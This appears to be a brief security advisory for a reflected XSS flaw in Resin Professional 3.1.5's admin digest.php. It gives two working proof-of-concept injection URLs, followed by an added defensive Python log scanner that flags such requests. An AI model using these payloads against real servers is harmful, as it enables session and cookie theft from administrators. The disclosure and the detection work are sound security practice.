This vulnerability does not require login. digest.php uses the REQUEST method
in a wrong way to accept parameters, so a malicious user could submit XSS code
on this page, and an attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials.



exp:



http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=";><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=

http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=";><script>alert("ZnVjayBjbnZk")</script><a



Tested on Resin Professional 3.1.5
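
For defenders checking their own server for attempts against this page, the following added example (not part of the original advisory) scans access-log lines for requests to /resin-admin/digest.php whose digest_realm or digest_username value contains `"`, `<` or `>` after URL decoding. The combined-style log format, the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory; the array form digest_username[]= is folded in below.
WATCHED = {"digest_realm", "digest_username"}
# Characters the advisory's requests rely on to leave the attribute and open a tag.
BREAKOUT = re.compile(r'["<>]')
# Request field of a combined-style access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return sorted watched parameter names whose decoded value contains markup characters."""
    parts = urlsplit(url)
    if not parts.path.endswith("/resin-admin/digest.php"):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        base = name.split("[", 1)[0]  # digest_username[] -> digest_username
        if base in WATCHED and BREAKOUT.search(value):
            hits.add(base)
    return sorted(hits)

def scan(lines):
    """Return (client_ip, [parameter names]) for each log line worth triaging."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings

# Constructed sample log lines (documentation IP ranges, harmless markup).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /resin-admin/digest.php'
    '?digest_attempt=1&digest_realm=%22%3E%3Cb%3Etest&digest_username[]= HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /resin-admin/digest.php'
    '?digest_attempt=1&digest_username=admin&digest_realm=resin HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /resin-admin/digest.php'
    '?digest_attempt=1&digest_username=%22%3E%3Cb%3Etest HTTP/1.1" 200 799',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, ",".join(params))
```

Only the query string is inspected, so values sent in a POST body do not appear in the access log and are not covered by this check.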
